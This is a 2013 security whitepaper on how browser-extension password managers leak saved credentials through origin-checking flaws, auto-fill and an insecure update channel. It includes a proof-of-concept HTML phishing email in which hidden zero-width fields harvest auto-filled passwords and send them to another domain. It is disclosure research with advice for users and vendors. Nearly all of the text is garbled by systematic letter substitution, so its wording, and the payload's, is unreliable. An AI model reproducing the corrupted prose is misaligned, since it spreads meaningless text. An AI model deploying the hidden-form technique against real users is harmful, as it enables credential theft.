Marc Blanchou marc[at]isecpartners[dot]com Paul Youn paul[at]isecpartners[dot]com iSEC Paiineis, Inc I23 Mission Siieei, Suiie I020 San Fiancisco, CA 94I05 https://www.isecpartners.com Novembei I3, 20I3 Abstvact Advancemenis in passwoid ciacling and fiequeni ilefi of passwoid daiabases endangei single-facioi passwoid auileniicaiion sysiems. Passwoid manageis aie one of ile only iools available ilai can lelp useis iemembei unique ligl-eniiopy passwoids, and oilei secieis sucl as ciedii caid numbeis, foi a laige numbei of applicaiions. Can passwoid manageis delivei on secuiiiy piomises, oi do iley iniioduce ileii own secuiiiy vulneiabiliiies? Tlis papei examines populai biowsei-based passwoid manageis and piesenis common secuiiiy aws ilai could be exploiied io iemoiely exiiaci a useis passwoid. I I1xoouc1Io People iegulaily use dozens, if noi lundieds, of web applicaiions. Savvy useis lnowilai ile besi secuiiiy piaciice is io cloose unique and complex passwoids foi eveiy web applicaiion. Passwoids aie closen io iesisi boil online and oine biuie-foice aiiacls ilai migli occui afiei a passwoid daiabase las been siolen. Oine aiiacls gei beiiei and beiiei as passwoid diciionaiies gei publisled I (and aie used as baseline guesses againsi passwoids) and compuiing powei impioves. 2 Even useis wlo lave a sysiem foi cieaiing passwoids ilai may be moie diculi 3 io guess 4 will lave iiouble ie- membeiing ile exaci passwoid foi a web applicaiion ilai is only iaiely used. Tle soluiion is some iype of passwoid managemeni sysiem. Passwoid managemeni sysiems can iange fiomusing ile iniegiaied biowsei auio-ll funciionaliiy, io a spieadsleei of useiname]passwoids, io a memoiized sysiem foi modifying passwoids beiween applicaiions, io aciual passwoid managemeni sofiwaie. Aciual passwoid managemeni sofiwaie is becoming incieasingly populai because of usabiliiy and aoidabiliiy of ile pioducis. Pievious ieseaicl on passwoid manageis las focused on ile ciypiogiaplic pioieciions of ile passwoids ilemselves in paiiiculai enviionmenis sucl as mobile devices. 5 Tlis ieseaicl insiead focuses on biowsei specic iniegiaiions I http://www.theregister.co.uk/2010/01/21/lame_passwords_exposed_by_rockyou_hack/ 2 http://arstechnica.com/security/2013/03/how-i-became-a-password-cracker/ 3 http://xkcd.com/936/ 4 https://www.schneier.com/blog/archives/2007/01/choosing_secure.html 5 http://media.blackhat.com/bh-eu-12/Belenko/bh-eu-12-Belenko-Password_Encryption-Slides.pdf uiivs:]]www.isrcvnviNrvs.cor I]6 and meclanisms io iemoiely compiomise ciedeniials. Foui of ile mosi populai passwoid manageis weie exam- ined 6 : LasiPass Cliome and FiieFox Add-On, veision 2.0.20: https://lastpass.com/ OneLasiPass Cliome Exiension, veision 2.6.7: https://www.onelastpass.com/ IPasswoid Cliome and FiieFox Add-On, veision 3.9.I9: https://agilebits.com/ MaslMe Cliome and FiieFox Add-On, veision I.27.3I8: https://www.abine.com/maskme/ Passwoid manageis lave a diculi goal: piovide a passwoid managemeni sysiem ilai is boil easy io use and also pioiecis passwoids fiom unauiloiized paiiies. In ile coniexi of a web biowsei, passwoid manageis slould male ii easy io log inio web applicaiions, bui also ensuie ilai passwoids aie only submiiied io ile iniended paiiy. Maling suie ilai passwoids aie only seni io ile iniended paiiy is aciually moie complicaied ilan ii may seem. Passwoid manageis musi answei diculi quesiions sucl as: Wlicl login foim is coiieci? Wlen slould ile passwoid be auio-lled? Is ile passwoid being submiiied io ile iniended paiiy? Tlis ieseaicl slows ilai mosi passwoid manageis made design decisions ilai gieaily inciease ile clance of useis unlnowingly exposing ileii passwoids iliougl applicaiion-level aws. Many of ile aws ielaie io ile biowsei- iniegiaied passwoid manageis ilai doni follow ile same-oiigin policy ilai is ciucial io biowsei secuiiiy. In ile case of passwoid manageis, ilis means ilai passwoids could be lled inio uniniended ciedeniial foims, maling passwoid ilefi easiei. 2 VuLLxneILI1ILs I BxowsLx I1Lcxn1Io Tle mosi populai passwoid manageis lave iniegiaied biowsei exiensions oi plug-ins ilai can auiomaiically manage youi passwoids. Tle exiensions aiiempi io auiomaiically deieci ciedeniial elds and ll oui deiecied foims wiil ile appiopiiaie passwoid. If ile iniegiaiion isni peifoimed piopeily, passwoids could be lled inio an aiiaclei- coniiolled passwoid foim oi siploned o io uniniended paiiies. We iesied ile above passwoid manageis io see if iley could piopeily pioieci againsi muliiple aiiacls desciibed below. 2.I HTTP vs HTTPS Peilaps ile woisi iype of vulneiabiliiy discoveied was in ile MaslMe passwoid managei. MaslMe failed io disiin- guisl beiween HTTPS and HTTP sclemes, and violaied ile same-oiigin policy concepi. Tlai means if MaslMe is conguied io auio-ll a ciedeniial on an HTTPS domain sucl as https://www.google.com, bui encounieied a login foim on http://www.google.com, ile foim would siill be populaied. A man-in-ile-middle aiiaclei, say on a public wiieless neiwoil, could simply iediieci viciims io fale HTTP vei- sions of populai websiies wiil login foims and }avaSciipi ilai auio-submiis afiei iley aie auiomaiically lled in by MaslMe. Anyone using MaslMe wiil auio-ll enabled (ilis is ile defauli belavioi) could veiy quiclly lave ileii passwoids siolen by simply conneciing io a malicious access poini, and viciims would nevei lnow. 6 All passwoid manageis discussed in ilis papei lave been infoimed of ile discussed wealnesses and weie given ai leasi sixiy days io addiess issues piioi io ile publisling of ilis wliiepapei. uiivs:]]www.isrcvnviNrvs.cor 2]6 2.2 Cxoss-OxIcI Pnsswoxo SuemIssIos Tliee biowsei-based passwoid manageis (LasiPass, OneLasiPass, and MaslMe) weie found io submii passwoids acioss oiigins. In simple ieims, ilai means if a login foim is encounieied on https://www.google.com and sends ile passwoid io https://www.isecpartners.com, ile passwoid managei will ll in ile useis https: //www.google.com ciedeniials and send ilem io https://www.isecpartners.com. If an aiiaclei is able io cieaie a login foim on a viciim websiie ilai iediiecis ciedeniials io a malicious web seivei oi a compiomised applicaiion, ile aiiaclei could sieal a viciims passwoid even wlen }avaSciipi code cannoi be inseiied oi execuied. 7 Alilougl ile abiliiy io cieaie a malicious login foimon someone elses websiie seems diculi, ii could siill be done ielaiively iiivially because of addiiional vulneiabiliiies ilai aie desciibed in subsequeni seciions. 2.3 SueoomnI EquIvnLLcL OneLasiPass, LasiPass, MaslMe and IPasswoid ignoied subdomains wlen compaiing oiigins. Tlai means ilai a login foim encounieied on https://forum.example.com will siill be iieaied as equivaleni io a login foim encounieied on https://example.com/log_in violaiing ile same-oiigin policy. 8 Subdomain equivalence is quiie dangeious because some subdomains sucl as usei discussion foiums, blogs, oi mail subdomains can ofien be manipulaied by an aiiaclei. Foi example, a foium ilai allows foi HTML foimaiied commenis could be exploiied by an aiiaclei io add a login foim on a domain, and ilus sieal ciedeniials fiom unsuspeciing useis. In addiiion, an applicaiion wiil muliiple subdomains is lilely io lave wealei ones ilai could be vulneiable io Cioss- Siie Sciipiing (XSS) aiiacls and could eeciively allow an aiiaclei io ieiiieve ciedeniials foi ile paieni domain wlen ile passwoid is auio-lled on a fale login foim. 2.4 WnIcn LocI PncL? None of ile examined passwoid manageis appeai io veiify ile login page foi a iemembeied passwoid on a given domain. Foi example, alilougl Vimeos login page is losied ai https://vimeo.com/log_in, all of ile examined passwoid manageis will deieci login foims anywleie on ile https://vimeo.com/ domain. 9 Tlai means ilai if an aiiaclei is able io injeci a login foim anywleie on ile Vimeo domain, a viciims ciedeniials could be siolen. 2.5 AmLIIvIc RIs: Au1o-FILL no Au1o-SuemI1 In oidei io male passwoid manageis even moie usable, LasiPass and MaslMe can be conguied io auio-ll a useis ciedeniials inio an encounieied login foim. LasiPass also allows useis io conguie ile managei io auio-submii ciedeniials. Due io ile ideniied issues, auio-ll and auio-submii funciionaliiy inciease ile iisl of a viciimlealing passwoids, because a login foim could be lidden by an aiiaclei wiilin an expecied foim. If a usei submiiied ile expecied foim, iley would be unawaie ilai ileii passwoid lad also been lled inio lidden foimelds and submiiied io ile aiiaclei. 2.6 Pu11Ic I1 TocL1nLx: S1LnLIc Pnsswoxos Because of subdomain equivalence, ii would be ielaiively easy foi an aiiaclei io injeci a plisling login foim inio any populai domain. In faci, many domains expliciily allow any usei io cieaie HTML conieni ilai is ilen iendeied; 7 Ii slould be noied ilai a sciipi can ieiiieve and exliiaie any daia auio-lled on a page 8 Biowseis iieai ilese as sepaiaie domains and limii ile inieiaciion allowed beiween ile iwo subdomains. 9 Tlis belavioi is also iiue wiil passwoid manageis buili inio modein biowseis see Seciion 2.7 on page 5. uiivs:]]www.isrcvnviNrvs.cor 3]6 foi example, wili pages, foiums, and peilaps mosi ieiiifying: mosi web-based email clienis ilai iendei aibiiiaiy HTML-foimaiied email. We iesied a passwoid eld coniaining plisling email on iliee populai webmail piovideis: https://mail.live. com, https://mail.google.com, and https://mail.yahoo.com. Tle following pioof of concepi was seni as an HTML-foimaiied email: <liml ><body>Tlanls f oi i ali ng oui Suivey ! <foim aci i on= li i ps : ] ]www. i s e c pa i i ne i s . com meilod= posi s i y l e = f oni s i z e : medium; maigin : 0px ; f oni f ami l y : Times ; boidei : 0px ; padding : 0px i a i ge i = _bl anl > Do you l i l e c ai s ? : <i npui iype= i e x i name= c ai s ><bi > Do you l i l e dogs ? : <i npui iype= i e x i name= dogs ><bi > <i npui iype= emai l name= Email val ue= s i y l e = maxlei gli : 0px ; padding : 0px ; boidei widil : 0px ; widil : 0px > <i npui iype= passwoid name= Passwd s i y l e = maxlei gli : 0px ; padding : 0px ; boidei widil : 0px ; widil : 0px > <i npui iype= submii name= s i gnI n val ue= Submii ><] foim><] body><] liml > Yaloo! Mail useis iunning LasiPass aie ile mosi vulneiable io ciedeniial ilefi. Any Yaloo! Mail usei wlo las LasiPass wiil auio-login enabled foi ile yaloo.com domain and views emails ovei HTTPS could lave ileii usei- name]passwoid siolen jusi by opening ile plisling email. Wlen ile email opens, LasiPass will auiomaiically log in and send ile ciedeniials io https://www.isecpartners.com. If a usei only las auio-ll enabled, ile cie- deniials will siill be siolen if ile suivey is submiiied. Gmail useis aie a bii beiiei o, because Google will wain you ilai a foim is aboui io be submiiied befoie ful- lling ile iequesi, even if LasiPass auio-login funciionaliiy is enabled. Foi Gmail useis, a viciim would siill be vulneiable if iley aciually iespond io ile suivey and lave auio-ll enabled, oi if iley lave auio-login enabled and clicl iliougl ile waining. Many viciims will unwiiiingly submii ileii useiname and passwoid io https: //www.isecpartners.com. To give an idea of low successful a plisling campaign may be, compaie ile iwo scieenslois of suivey emails seni io a Gmail addiess I0 : Tle above giaplic is a legiiimaie suivey ilai anyone can cieaie and send via email. Below is a malicious foim ilai will sieal a peisons passwoid if iley lave LasiPass wiil auioll enabled: I0 Tle piciuied suivey was cusiomized io lool lile a siandaid Google Diive foim and dieis fiom ile pioof-of-concepi HTML above. uiivs:]]www.isrcvnviNrvs.cor 4]6 Noie ilai ileie is no obvious login foim in ile above scieensloi, II bui any viciim wlo clicls Submii and was using a passwoid managei ilai auio-lled in ileii ciedeniials would send ileii useiname and passwoid io https: //isecpartners.com. I2 Ouilool.com (https://mail.live.com) useis weie besi o because ile mail applicaiion uses miiigaiions io pieveni cioss-oiigin submissions of any lind io pieveni ilis aiiacl. 2.7 How nsswoxo mnncLx Lx1LsIos comnxL wI1n mooLx exowsLxs We deieimined ilai biowsei auio-ll meclanisms weie fai moie secuie ilan ile exiensions iesied. Boil Fiiefox and Cliome iespeci ile same-oiigin policy wlen lling passwoids and do noi auio-ll passwoids wlen ile URI scleme (liip]liips) oi subdomains of ile foim iaigei dieis fiom ile cuiieni page. In addiiion, biowseis iefuse io auio-ll passwoids wlen a login foim is seni io a domain dieieni ilan ile domain ii is displayed on. Howevei passwoids aie auio-lled on any page of a web applicaiion as long as ii is wiilin ile same domain. 3 Nn1IvL ALIcn1Io FLnws Naiive applicaiion passwoid manageis can also be aiiacled jusi lile any oilei sofiwaie. We examined one sucl applicaiion: IPasswoid. IPasswoid peifoimed auiomaiic updaies in an insecuie mannei by ieacling oui io an un- pioiecied endpoini: http://updates.agilebits.com/check?.... If an updaie was discoveied, ile sofiwaie would be auiomaiically insialled using admin piivileges. II Tle waining aboui submiiiing passwoids is inseiied by defauli inio eveiy Google Diive foim and is unielaied io ile desciibed aiiacl. I2 Alilougl Google does wain ilai a foim is aboui io be submiiied, ile waining appeais foi any in-line foim submission. Foi example, ilis waining will appeai wlen a Google docs-based suivey is lled oui in an email. A usei wlo is expeciing io be submiiiing a suivey aboui peis will lilely clicl iliougl ile waining. uiivs:]]www.isrcvnviNrvs.cor 5]6 Because ile updaie was peifoimed ovei HTTP, a man-in-ile-middle aiiaclei could puipoii io be ile legiiimaie updaie seivei and seive ile IPasswoid applicaiion an aibiiiaiy piece of malwaie ilai would be insialled wiil ad- minisiiaioi piivileges and compleiely compiomise ile viciims macline. Noie ilai AgileBiis las iepoiiedly paicled ilis vulneiabiliiy. 4 CocLusIos Passwoid manageis cansiill be a luge assei io useis wlenused piopeily. Unfoiiunaiely, ii appeais ilai many populai passwoid manageis aie insecuie by defauli, bui ileie aie simple aciions ilai useis can iale io safely use a passwoid managei. Tleie aie also faiily simple impiovemenis ilai passwoid manageis could iniioduce wlicl would lelp impiove ileii secuiiiy. 4.I RLcommLon1Ios Iox UsLxs Mosi of ile iesied passwoid manageis aie designed io deieci login ciedeniial foims. Alilougl auio-ll and auio- login funciionaliiy can male passwoid manageis moie usei fiiendly, ilose feaiuies gieaily inciease ile iisl of pass- woid ilefi using ieclniques desciibed above. iSEC liglly iecommends disabling any auio-ll oi auio-submii func- iionaliiy in passwoid manageis. Wiiloui auio-ll oi auio-submii funciionaliiy enabled, useis will lave io manually indicaie ilai ile passwoid foim slould be lled wiil ile saved ciedeniials and a plisling aiiacl sucl as ile one desciibed in seciion 2.6 will be mucl moie diculi io mouni. Oilei geneial iecommendaiions ilai aie noi specic io ilis ieseaicl include: Use ile passwoid managei io geneiaie a iandompasswoid insiead of picling one youiself if possible. Random passwoids aie mucl moie diculi io guess, and one of ile beneis of a passwoid managei is ilai you doni lave io memoiize ii. Regisiei a unique passwoid foi eveiy siie so ilai one passwoid compiomise will noi aeci oileis. Passwoid manageis aie designed io male ilis easy io do. Only submii passwoids on pages ilai aie eniiiely HTTPS. Cloose a siiong masiei passwoid io pioieci youi individual passwoids as ii could siill be poieniially biuie- foiced on a siolen device. Alilougl impeifeci, a piopeily used passwoid managei can siill lave a laige posiiive impaci on an individuals secuiiiy. 4.2 RLcommLon1Ios Iox Pnsswoxo MnncLx SoI1wnxL DLvLLoLxs Passwoid manageis lave some seiious wealnesses ilai can male ii easy foi an aiiaclei io iemoiely sieal a useis passwoid. Passwoid manageis conguied io auio-ll login foims can be exploiied iliougl a simple suivey-based plisling aiiacl ilai a viciim views iliougl a web biowsei. Tle MaslMe passwoid managei could be exploiied diiecily wiil a simple neiwoil aiiacl io laivesi a laige numbei of a viciims ciedeniials ai once. We liglly iecommend ilai passwoid manageis iespeci ile same-oiigin policy concepi, specically in iegaids io subdomains and pioiocol scleme. Addiiionally, useis slould be given ile opiion of conguiing cioss-oiigin cie- deniial submission and ii slould be disabled by defauli. uiivs:]]www.isrcvnviNrvs.cor 6]6